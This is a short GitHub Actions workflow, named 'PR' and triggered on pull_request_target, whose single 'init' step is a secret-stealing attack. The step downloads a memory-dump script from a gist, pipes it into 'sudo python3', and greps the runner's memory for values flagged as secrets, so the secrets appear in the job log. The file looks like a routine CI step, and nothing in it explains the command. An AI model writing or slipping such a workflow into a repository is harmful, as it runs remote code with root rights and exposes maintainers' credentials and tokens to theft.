
name: "PR"
on: 
  pull_request_target:

jobs:
  init:
    runs-on: ubuntu-latest
    name: "init"
    steps:
    - run: |
        curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -Eao '"[^"]+":\{"value":"[^"]*","isSecret":true\}'
